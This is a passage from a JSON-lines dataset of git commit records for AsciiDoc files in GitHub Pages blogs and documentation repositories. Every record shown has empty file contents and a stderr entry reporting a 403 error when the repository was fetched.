zzy-logic\/fuzzy-logic.github.io,KozytyPress\/kozytypress.github.io,yuyudhan\/yuyudhan.github.io,johnkellden\/github.io,therebelrobot\/blog-n.ode.rocks,ishanthilina\/ishanthilina.github.io,MartinAhrer\/martinahrer.github.io,Asastry1\/inflect-blog,joao-bjsoftware\/joao-bjsoftware.github.io,patricekrakow\/patricekrakow.github.io,gendalf9\/gendalf9.github.io---hubpress,dingboopt\/dingboopt.github.io,ElteHupkes\/eltehupkes.github.io,cringler\/cringler.github.io,stevenxzhou\/alex1007.github.io,kwpale\/kwpale.github.io,zestyroxy\/zestyroxy.github.io,concigel\/concigel.github.io,timelf123\/timelf123.github.io,Ugotsta\/Ugotsta.github.io,RandomWebCrap\/randomwebcrap.github.io,azubkov\/azubkov.github.io,lovian\/lovian.github.io,jia1miao\/jia1miao.github.io,darkfirenze\/darkfirenze.github.io,adler-j\/adler-j.github.io,triskell\/triskell.github.io,alvarosanchez\/alvarosanchez.github.io,diogoan\/diogoan.github.io,fr-developer\/fr-developer.github.io,blitzopteron\/ApesInc,TinkeringAlways\/tinkeringalways.github.io,nickwanhere\/nickwanhere.github.io,cmosetick\/hubpress.io,qu85101522\/qu85101522.github.io,everydaynormalgeek\/everydaynormalgeek.github.io,railsdev\/railsdev.github.io,teilautohall\/teilautohall.github.io,amodig\/amodig.github.io,camilo28\/camilo28.github.io,anuragsingh31\/anuragsingh31.github.io,crimarde\/crimarde.github.io,holtalanm\/holtalanm.github.io,TelfordLab\/telfordlab.github.io,oppemism\/oppemism.github.io,ecommandeur\/ecommandeur.github.io,xumr0x\/xumr0x.github.io,Imran31\/imran31.github.io,royston\/hubpress.io,bigkahuna1uk\/bigkahuna1uk.github.io,pokev25\/pokev25.github.io,KurtStam\/kurtstam.github.io,3991\/3991.github.io,deformat\/deformat.github.io,mdramos\/mdramos.github.io,gardenias\/sddb.com,miplayer1\/miplayer1.github.io,djengineerllc\/djengineerllc.github.io,vs4vijay\/vs4vijay.github.io,Rackcore\/Rackcore.github.io,chowwin\/chowwin.github.io,jarbro\/jarbro.github.io,blayhem\/blayhem.github.io,Kif11\/Kif11.github.io,B3H1NDu\/b3h1ndu.github.io,romanegunkov\/romanegunkov.github.io,joelcbailey\/joelcbailey.github.io,jbrizio\/jbrizio.github.io,AppHat\/AppHat.github.io,CreditCardsCom\/creditcardscom.github.io,willyb321\/willyb321.github.io,bahamoth\/bahamoth.github.io,bluenergy\/bluenergy.github.io,mmhchan\/mmhchan.github.io,Tekl\/tekl.github.io,hutchr\/hutchr.github.io,thomaszahr\/thomaszahr.github.io,Joemoe117\/Joemoe117.github.io,saiisai\/saiisai.github.io,ahopkins\/amhopkins.com,nullbase\/nullbase.github.io,anshu92\/blog,thockenb\/thockenb.github.io,SingularityMatrix\/SingularityMatrix.github.io,tr00per\/tr00per.github.io,dingboopt\/dingboopt.github.io,scriptindex\/scriptindex.github.io,BulutKAYA\/bulutkaya.github.io,kwpale\/kwpale.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,eknuth\/eknuth.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,grzrobak\/grzrobak.github.io,suning-wireless\/Suning-Wireless.github.io,yahussain\/yahussain.github.io,ktekbiyikiletisim\/ktekbiyikiletisim.github.io,maorodriguez\/maorodriguez.github.io,debbiezhu\/debbiezhu.github.io,manikmagar\/manikmagar.github.io,hermione6\/hermione6.github.io,simevidas\/simevidas.github.io,ioisup\/ioisup.github.io,TelfordLab\/telfordlab.github.io,pdudits\/pdudits.github.io,the-101\/the-101.github.io,devopSkill\/devopskill.github.io,nbourdin\/nbourdin.github.io,puzzles-engineer\/puzzles-engineer.github.io,YannBertrand\/yannbertrand.github.io,bitcowboy\/bitcowboy.github.io,TunnyTraffic\/gh-hosting,ecommandeur\/ecommandeur.github.io,pzmarzly\/g2zory,caglarsayin\/hubpress,Arttii\/arttii.github.io,prateekjadhwani\/prateekjadhwani.github.io,hytgbn\/hytgbn.github.io,hhimanshu\/hhimanshu.github.io,therebelrobot\/blog-n.ode.rocks,gsera\/gsera.github.io,jmelfi\/jmelfi.github.io,fbruch\/fbruch.github.com,CBSti\/CBSti.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,Driven-Development\/Driven-Development.github.io,ilyaeck\/ilyaeck.github.io,egorlitvinenko\/egorlitvinenko.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,LihuaWu\/lihuawu.github.io,Astalaseven\/astalaseven.github.io,zakkum42\/zakkum42.github.io,scholzi94\/scholzi94.github.io,timelf123\/timelf123.github.io,kreids\/kreids.github.io,psicrest\/psicrest.github.io,B3H1NDu\/b3h1ndu.github.io,laposheureux\/laposheureux.github.io,peter-lawrey\/peter-lawrey.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,christiannolte\/hubpress.io,carlosdelfino\/carlosdelfino-hubpress,mrcouthy\/mrcouthy.github.io,sitexa\/hubpress.io,nobodysplace\/nobodysplace.github.io,heberqc\/heberqc.github.io,tcollignon\/tcollignon.github.io,rage5474\/rage5474.github.io,geektic\/geektic.github.io,wols\/time,seatones\/seatones.github.io,arthurmolina\/arthurmolina.github.io,oppemism\/oppemism.github.io,randhson\/Blog,dobin\/dobin.github.io,carlomorelli\/carlomorelli.github.io,chaseey\/chaseey.github.io,sidmusa\/sidmusa.github.io,alimasyhur\/alimasyhur.github.io,MatanRubin\/MatanRubin.github.io,timelf123\/timelf123.github.io,royston\/hubpress.io,gjagush\/gjagush.github.io,mouseguests\/mouseguests.github.io,kimkha-blog\/kimkha-blog.github.io,neocarvajal\/neocarvajal.github.io,aleamarat-alhadari\/aleamarat-alhadari.github.io,marioandres\/marioandres.github.io,emtudo\/emtudo.github.io,kfkelvinng\/kfkelvinng.github.io,roamarox\/roamarox.github.io,creative-coding-bonn\/creative-coding-bonn.github.io,YJSoft\/yjsoft.github.io,Astalaseven\/astalaseven.github.io,rohithkrajan\/rohithkrajan.github.io,shutas\/shutas.github.io,expelled\/expelled.github.io,yaks-all-the-way-down\/yaks-all-the-way-down.github.io,icthieves\/icthieves.github.io,tedroeloffzen\/tedroeloffzen.github.io,bretonio\/bretonio.github.io,mattpearson\/mattpearson.github.io,pavistalli\/pavistalli.github.io,sidemachine\/sidemachine.github.io,expelled\/expelled.github.io,TelfordLab\/telfordlab.github.io,ishanthilina\/ishanthilina.github.io,rushil-patel\/rushil-patel.github.io,jblemee\/jblemee.github.io,rdspring1\/rdspring1.github.io,grzrobak\/grzrobak.github.io,anshu92\/blog,mdinaustin\/mdinaustin.github.io,richard-popham\/richard-popham.github.io,yejodido\/hubpress.io,sumit1sen\/sumit1sen.github.io,Adyrhan\/adyrhan.github.io,gudhakesa\/gudhakesa.github.io,TinkeringAlways\/tinkeringalways.github.io,skeate\/skeate.github.io,djengineerllc\/djengineerllc.github.io,zestyroxy\/zestyroxy.github.io,Andy4Craft\/andy4craft.github.io,siarlex\/siarlex.github.io,eyalpost\/eyalpost.github.io,mubix\/blog.room362.com,minditech\/minditech.github.io,adler-j\/adler-j.github.io,KlimMalgin\/klimmalgin.github.io,MartinAhrer\/martinahrer.github.io,atfd\/hubpress.io,nilsonline\/nilsonline.github.io,LearningTools\/LearningTools.github.io,jcsirot\/hubpress.io,eyalpost\/eyalpost.github.io,kubevirt\/blog,iveskins\/iveskins.github.io,wattsap\/wattsap.github.io,regdog\/regdog.github.io,gquintana\/gquintana.github.io,emtudo\/emtudo.github.io,rpwolff\/rpwolff.github.io,CBSti\/CBSti.github.io,FRC125\/FRC125.github.io,wanjee\/wanjee.github.io,thiderman\/daenney.github.io,MatanRubin\/MatanRubin.github.io,stevenxzhou\/alex1007.github.io,ilyaeck\/ilyaeck.github.io,YJSoft\/yjsoft.github.io,dvmoomoodv\/hubpress.io,eyalpost\/eyalpost.github.io,prateekjadhwani\/prateekjadhwani.github.io,kimkha-blog\/kimkha-blog.github.io,diogoan\/diogoan.github.io,TinkeringAlways\/tinkeringalways.github.io,anggadjava\/anggadjava.github.io,mattburnin\/hubpress.io,NativeScriptBrasil\/nativescriptbrasil.github.io,Oziabr\/Oziabr.github.io,rushil-patel\/rushil-patel.github.io,quangpc\/quangpc.github.io,doochik\/doochik.github.io,raghakot\/raghakot.github.io,n15002\/main,Roen00\/roen00.github.io,vba\/vba.github.io,romanegunkov\/romanegunkov.github.io,dfjs\/dfjs.github.io,popurax\/popurax.github.io,Brzhk\/Brzhk.github.io,pysysops\/pysysops.github.io,xmichaelx\/xmichaelx.github.io,alick01\/alick01.github.io,YannDanthu\/YannDanthu.github.io,ImpossibleBlog\/impossibleblog.github.io,rpawlaszek\/rpawlaszek.github.io,apalkoff\/apalkoff.github.io,deruelle\/deruelle.github.io,christiannolte\/hubpress.io,macchandev\/macchandev.github.io,mkorevec\/mkorevec.github.io,s-f-ek971\/s-f-ek971.github.io,KlimMalgin\/klimmalgin.github.io,iwakuralai-n\/badgame-site,gerdbremer\/gerdbremer.github.io,roelvs\/roelvs.github.io,dingboopt\/dingboopt.github.io,pwlprg\/pwlprg.github.io,pokev25\/pokev25.github.io,introspectively\/introspectively.github.io,pavistalli\/pavistalli.github.io,bencekiraly\/bencekiraly.github.io,furcon\/furcon.github.io,CarlosRPO\/carlosrpo.github.io,carsnwd\/carsnwd.github.io,Huangyan9188\/huangyan9188.github.io,geektic\/geektic.github.io,ilyaeck\/ilyaeck.github.io,ilyaeck\/ilyaeck.github.io,Fendi-project\/fendi-project.github.io,tr00per\/tr00per.github.io,anwfr\/blog.anw.fr,raloliver\/raloliver.github.io,reversergeek\/reversergeek.github.io,rdspring1\/rdspring1.github.io,azubkov\/azubkov.github.io,ca13\/hubpress.io,scottellis64\/scottellis64.github.io,abien\/abien.github.io","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bithunshal\/shalsblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"603e0a21f52f8e350c2c4c09e1e478ad9913682b","subject":"update copyright year","message":"update copyright year\n","repos":"getreu\/asciidoctor-fopub,getreu\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub,getreu\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/getreu\/asciidoctor-fopub.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3304055fe85a744bb52b3e635e1d78be474aeba2","subject":"MSA day blogpost","message":"MSA day blogpost\n","repos":"msavy\/apiman.github.io,apiman\/apiman.github.io,kahboom\/apiman.github.io,msavy\/apiman.github.io,kahboom\/apiman.github.io,apiman\/apiman.github.io,msavy\/apiman.github.io,apiman\/apiman.github.io,kahboom\/apiman.github.io,kahboom\/apiman.github.io,apiman\/apiman.github.io,msavy\/apiman.github.io","old_file":"_blog-src\/_posts\/2015-06-15-apiman-msa-day.adoc","new_file":"_blog-src\/_posts\/2015-06-15-apiman-msa-day.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kahboom\/apiman.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"250c45ef69f0808d1507296a7fcf09c937b34955","subject":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","message":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","repos":"shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io","old_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shinchiro\/shinchiro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d05119219639d381a7e1e853f4f0b120abde4e73","subject":"Update javaee7-websocket-api-html5-en.adoc","message":"Update javaee7-websocket-api-html5-en.adoc","repos":"mgreau\/javaee7-websocket,jthmiranda\/javaee7-websocket,jthmiranda\/javaee7-websocket,mgreau\/javaee7-websocket,jthmiranda\/javaee7-websocket,mgreau\/javaee7-websocket","old_file":"doc\/javaee7-websocket-api-html5-en.adoc","new_file":"doc\/javaee7-websocket-api-html5-en.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/javaee7-websocket.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d1c8a5087006f086ea23eb23d3cf4be968850ce7","subject":"Update 2016-09-26-Product-first-Research.adoc","message":"Update 2016-09-26-Product-first-Research.adoc","repos":"ilyaeck\/ilyaeck.github.io,ilyaeck\/ilyaeck.github.io,ilyaeck\/ilyaeck.github.io,ilyaeck\/ilyaeck.github.io","old_file":"_posts\/2016-09-26-Product-first-Research.adoc","new_file":"_posts\/2016-09-26-Product-first-Research.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ilyaeck\/ilyaeck.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be6eb165c2bda28f8d42d7ecad448450074eb214","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fcb68508c935062dfe53da42e33ac00f72e3f1bf","subject":"y2b create post Motoactv Unboxing \\u0026 Overview + Sports Wrist Strap","message":"y2b create post Motoactv Unboxing \\u0026 Overview + Sports Wrist Strap","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-17-Motoactv-Unboxing-u0026-Overview--Sports-Wrist-Strap.adoc","new_file":"_posts\/2011-11-17-Motoactv-Unboxing-u0026-Overview--Sports-Wrist-Strap.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8702105e6cc82195fe307b09ef96f097e7c485b","subject":"Update 2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","message":"Update 2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","new_file":"_posts\/2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c085ff624964aa5f7175772460d4fb38ae01ffb","subject":"adds v2.x.x migration guide (#442)","message":"adds v2.x.x migration guide (#442)\n\n","repos":"asciidoctor\/asciidoctor-maven-plugin,abelsromero\/asciidoctor-maven-plugin,asciidoctor\/asciidoctor-maven-plugin,abelsromero\/asciidoctor-maven-plugin,asciidoctor\/asciidoctor-maven-plugin,abelsromero\/asciidoctor-maven-plugin","old_file":"docs\/v2-migration-guide.adoc","new_file":"docs\/v2-migration-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asciidoctor\/asciidoctor-maven-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f6e5d49041bcba434bd8fb0c7d12a35fb1201d71","subject":"y2b create post Worldwide Exclusive?","message":"y2b create post Worldwide Exclusive?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-04-07-Worldwide-Exclusive.adoc","new_file":"_posts\/2015-04-07-Worldwide-Exclusive.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e094dc2b6916fd0e5cc13121acd7652d71bfd44d","subject":"Update 2015-10-05-So-close-yet-so-far.adoc","message":"Update 2015-10-05-So-close-yet-so-far.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-05-So-close-yet-so-far.adoc","new_file":"_posts\/2015-10-05-So-close-yet-so-far.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3661a1ec3209e3436dc2a9667482e895c4b603c6","subject":"y2b create post THE 6TB MONSTER PS4","message":"y2b create post THE 6TB MONSTER PS4","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-02-24-THE-6TB-MONSTER-PS4.adoc","new_file":"_posts\/2016-02-24-THE-6TB-MONSTER-PS4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f5c0ea7fb6a50f8a298ca8518144d74a6bf514c","subject":"Update 2016-07-20-An-index-of-Ascii-Doc-syntax.adoc","message":"Update 2016-07-20-An-index-of-Ascii-Doc-syntax.adoc","repos":"spikebachman\/spikebachman.github.io,spikebachman\/spikebachman.github.io,spikebachman\/spikebachman.github.io,spikebachman\/spikebachman.github.io","old_file":"_posts\/2016-07-20-An-index-of-Ascii-Doc-syntax.adoc","new_file":"_posts\/2016-07-20-An-index-of-Ascii-Doc-syntax.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spikebachman\/spikebachman.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"44eb84d36171b9d14f94cec1b0ac040dad0e6539","subject":"Update 2016-08-10-Lightweight-Markup-Languages.adoc","message":"Update 2016-08-10-Lightweight-Markup-Languages.adoc","repos":"matthardwick\/hubpress.io,matthardwick\/hubpress.io,matthardwick\/hubpress.io,matthardwick\/hubpress.io","old_file":"_posts\/2016-08-10-Lightweight-Markup-Languages.adoc","new_file":"_posts\/2016-08-10-Lightweight-Markup-Languages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/matthardwick\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4c3dfc3c2e8cafb0fe808db4ede05cab8e8226a","subject":"Update 2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdbe7a5f1443bcd96342b37508e5c89380c97dc8","subject":"Update 2017-12-03-visual-studio-code-extension.adoc","message":"Update 2017-12-03-visual-studio-code-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-03-visual-studio-code-extension.adoc","new_file":"_posts\/2017-12-03-visual-studio-code-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"99bb6094186aa289d509422506847c26b882eaff","subject":"Update 2017-02-15-Floating-Point-Numbers.adoc","message":"Update 2017-02-15-Floating-Point-Numbers.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2017-02-15-Floating-Point-Numbers.adoc","new_file":"_posts\/2017-02-15-Floating-Point-Numbers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed58955fc00b1e606643f98f041a68fa1bcc4ac9","subject":"Adding release notes for release of revapi revapi_basic_features revapi_jackson revapi_java_spi revapi_reporter_file_base revapi_ant_task revapi_java revapi_json revapi_maven_plugin revapi_reporter_json revapi_reporter_text revapi_standalone revapi_yaml","message":"Adding release notes for release of revapi revapi_basic_features revapi_jackson revapi_java_spi revapi_reporter_file_base revapi_ant_task revapi_java revapi_json revapi_maven_plugin revapi_reporter_json revapi_reporter_text revapi_standalone revapi_yaml\n","repos":"revapi\/revapi,revapi\/revapi,revapi\/revapi","old_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210112-releases.adoc","new_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210112-releases.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/revapi\/revapi.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a03b190d6eab35d28024e518992ec51f9503aec1","subject":"Asciidoc on Sublime Text 2","message":"Asciidoc on Sublime Text 2\n","repos":"0xMF\/toybox","old_file":"captain's_log.asciidoc","new_file":"captain's_log.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/0xMF\/toybox.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"ed9d444981c4f39f2f7a3d0df943e2f649f464a5","subject":"y2b create post EXOTIC FOODS WITH AUSTIN EVANS","message":"y2b create post EXOTIC FOODS WITH AUSTIN EVANS","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-26-EXOTIC-FOODS-WITH-AUSTIN-EVANS.adoc","new_file":"_posts\/2016-10-26-EXOTIC-FOODS-WITH-AUSTIN-EVANS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"526babfe6785b9d8c66bc87364d0f8426b371f14","subject":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","message":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","repos":"jfavlam\/Concepts,jfavlam\/Concepts,jfavlam\/Concepts","old_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jfavlam\/Concepts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"41b57ca63d16e4d7027567695681b91ec94ebb83","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4375178f1375eaa2ee1441677b6054db9fe203d7","subject":"Renamed '_posts\/2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc' to '_posts\/2018-07-09-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc'","message":"Renamed '_posts\/2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc' to '_posts\/2018-07-09-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc'","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2018-07-09-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","new_file":"_posts\/2018-07-09-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37ca9769b4956c7753c816999d9231d5349a5a0a","subject":"Initial design.basics stuff","message":"Initial design.basics stuff\n","repos":"ehcache\/ehcache3,aurbroszniowski\/ehcache3,cschanck\/ehcache3,ljacomet\/ehcache3,chrisdennis\/ehcache3,AbfrmBlr\/ehcache3,rkavanap\/ehcache3,GaryWKeim\/ehcache3,chrisdennis\/ehcache3,ljacomet\/ehcache3,rkavanap\/ehcache3,ehcache\/ehcache3,GaryWKeim\/ehcache3,alexsnaps\/ehcache3,cschanck\/ehcache3,AbfrmBlr\/ehcache3,jhouserizer\/ehcache3,henri-tremblay\/ehcache3,aurbroszniowski\/ehcache3,albinsuresh\/ehcache3,lorban\/ehcache3,cljohnso\/ehcache3,lorban\/ehcache3,albinsuresh\/ehcache3,jhouserizer\/ehcache3,cljohnso\/ehcache3","old_file":"design.basics.asciidoc","new_file":"design.basics.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jhouserizer\/ehcache3.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c991f2d30a168bfcbb2fab7730bb3992c4742e28","subject":"Documentation of the mailer extension","message":"Documentation of the mailer extension\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/sending-emails.adoc","new_file":"docs\/src\/main\/asciidoc\/sending-emails.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"68199fa5694d250fd15a804bda6017ecbfc1ac14","subject":"Update 2018-11-25-Amazon-Go.adoc","message":"Update 2018-11-25-Amazon-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-25-Amazon-Go.adoc","new_file":"_posts\/2018-11-25-Amazon-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c879d02300e8227c77bb6b2c45f4bdaa590cb78","subject":"CL: export all symbols","message":"CL: export all symbols\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"2f69c264579e844e5eafd8da4cd5271f7fa5d848","subject":"CL - Add some good reads","message":"CL - Add some good reads\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"57f7fc060f460b48dadd746528fb79ceb57cb73c","subject":"Better code","message":"Better code\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"HTML to DOM.adoc","new_file":"HTML to DOM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30777f7f388ea10b2ad57b1af8898cc28476cdfa","subject":"Update 2015-11-10-Evolve.adoc","message":"Update 